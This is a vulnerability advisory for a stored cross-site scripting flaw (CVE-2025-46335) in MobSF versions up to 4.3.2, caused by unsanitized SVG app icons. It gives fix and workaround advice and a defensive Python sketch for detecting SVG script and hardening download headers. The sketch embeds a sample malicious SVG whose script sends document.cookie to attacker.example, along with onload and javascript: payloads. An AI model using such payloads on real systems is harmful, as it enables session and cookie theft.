PT-2025-19768

Ssshah2131 · Published 2025-05-05 · Updated 2025-08-07 · CVE-2025-46335

CVSS v4.0: 8.6 (High)
Vector: AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N
Name of the Vulnerable Software and Affected Versions: Mobile Security Framework (MobSF), versions up to and including 4.3.2
Description: A stored cross-site scripting (XSS) vulnerability has been identified in MobSF. It stems from missing validation and sanitization of user-supplied SVG files in the Android APK analysis workflow. When an Android Studio project that uses a malicious SVG as its app icon is zipped and uploaded to MobSF, the tool extracts the archive and stores the SVG without inspecting it. The extracted file is then served through the web interface's download endpoint. Because an SVG can carry embedded JavaScript (for example a script element or an onload handler), opening that URL directly in a browser executes the script in the origin of the MobSF web application, under the session of the user who opened it, which makes this a stored XSS.
Recommendations: For versions up to and including 4.3.2, update to version 4.3.3, which fixes the issue. As a temporary workaround, block the download endpoint from serving files with the .svg extension (for example with a rule at the reverse proxy in front of MobSF) to reduce the risk of exploitation, and avoid opening http://127.0.0.1:8081/download/filename.svg URLs in a browser until the update is applied.
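As an added illustration (not MobSF's own code, and not a description of what the 4.3.3 patch changed), the Python sketch below shows the two halves of the problem described above: a constructed "app icon" SVG that carries script, and a download endpoint that either refuses such a file or serves every file in a way that cannot execute in the MobSF origin. The SVG samples, the function names and the `serve_download` routing are constructed for this example; the response-header hardening is one standard approach, not a claim about how the upstream fix works.

```python
"""
Added example (not MobSF code): detecting active content in an uploaded SVG
and serving downloads so a stored file cannot execute as a same-origin page.
"""
import re
import xml.etree.ElementTree as ET  # for untrusted XML prefer defusedxml.ElementTree (same API)

# Constructed sample: an icon an attacker could drop into an Android Studio
# project (e.g. res/drawable/ic_launcher.svg) before zipping and uploading it.
MALICIOUS_ICON_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="108" height="108" onload="alert(document.cookie)">
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <a xlink:href="javascript:alert(1)"><rect width="108" height="108" fill="#3ddc84"/></a>
</svg>"""

# Constructed sample: a harmless icon that must still pass.
BENIGN_ICON_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="108" height="108">
  <circle cx="54" cy="54" r="40" fill="#3ddc84"/>
</svg>"""

SCRIPT_CAPABLE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
# ElementTree reports namespaced attributes as '{uri}href', so xlink:href shows up as 'href'.
URL_ATTRIBUTES = {"href", "src", "to", "from", "values"}
ACTIVE_SCHEME = re.compile(r"^\s*(javascript|data|vbscript)\s*:", re.IGNORECASE)


def _local_name(qualified: str) -> str:
    """Strip a namespace, e.g. '{http://www.w3.org/2000/svg}script' -> 'script'."""
    return qualified.rsplit("}", 1)[-1].lower()


def svg_active_content(data: bytes) -> list[str]:
    """
    Reasons an SVG could run script when navigated to directly; [] means none found.
    Malformed input is reported as a finding rather than accepted, because
    browsers render SVG leniently and a parser failure is not a safety result.
    """
    findings: list[str] = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    for elem in root.iter():
        name = _local_name(elem.tag)
        if name in SCRIPT_CAPABLE_ELEMENTS:
            findings.append(f"<{name}> element")
        for attr, value in elem.attrib.items():
            attr_name = _local_name(attr)
            if attr_name.startswith("on"):  # onload, onclick, onerror, ...
                findings.append(f"event handler attribute {attr_name}=")
            elif attr_name in URL_ATTRIBUTES and ACTIVE_SCHEME.match(value):
                findings.append(f"{attr_name} uses scheme {value.split(':', 1)[0].strip().lower()}:")
    return findings


def download_headers(filename: str, content_type: str) -> dict[str, str]:
    """
    Headers for a download endpoint that must never render a stored file as a
    same-origin document:
      * Content-Disposition: attachment  -> saved, not rendered, so SVG script never runs
      * X-Content-Type-Options: nosniff  -> no sniffing a body back into an active type
      * CSP 'sandbox'                    -> belt-and-braces if a client renders anyway
    Script-capable types are also downgraded to application/octet-stream.
    """
    if content_type.lower() in {"image/svg+xml", "text/html", "application/xhtml+xml"}:
        content_type = "application/octet-stream"
    # Drop any path component and characters that could break out of the quoted filename.
    safe_name = re.sub(r"[^\w.\-]", "_", filename.rsplit("/", 1)[-1])
    return {
        "Content-Type": content_type,
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


def serve_download(filename: str, data: bytes) -> tuple[int, dict[str, str], bytes]:
    """(status, headers, body) for a hardened download route; hypothetical design."""
    if filename.lower().endswith(".svg"):
        findings = svg_active_content(data)
        if findings:
            return 403, {"Content-Type": "text/plain"}, ("refused: " + "; ".join(findings)).encode()
        return 200, download_headers(filename, "image/svg+xml"), data
    return 200, download_headers(filename, "application/octet-stream"), data


if __name__ == "__main__":
    print(svg_active_content(MALICIOUS_ICON_SVG))
    print(serve_download("ic_launcher.svg", BENIGN_ICON_SVG)[1])
```

The content check is a reject-or-accept gate, not a sanitizer: rewriting an attacker's SVG into a "clean" one is error-prone, and refusing it at upload time (or at download time, as here) is the safer default. The header hardening is independent of it and is what actually closes the direct-navigation XSS, since a browser that receives `Content-Disposition: attachment` saves the file instead of executing it in the MobSF origin; applying both means a file that slips past the parser still cannot run. If the SVG has to remain viewable, serve it from a separate origin that carries no session cookies rather than from the application's own host.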

XSS

Related Identifiers

BDU:2025-09278
CVE-2025-46335
GHSA-MWFG-948F-2CC5

Affected Products

Android Studio
MobSF
RED OS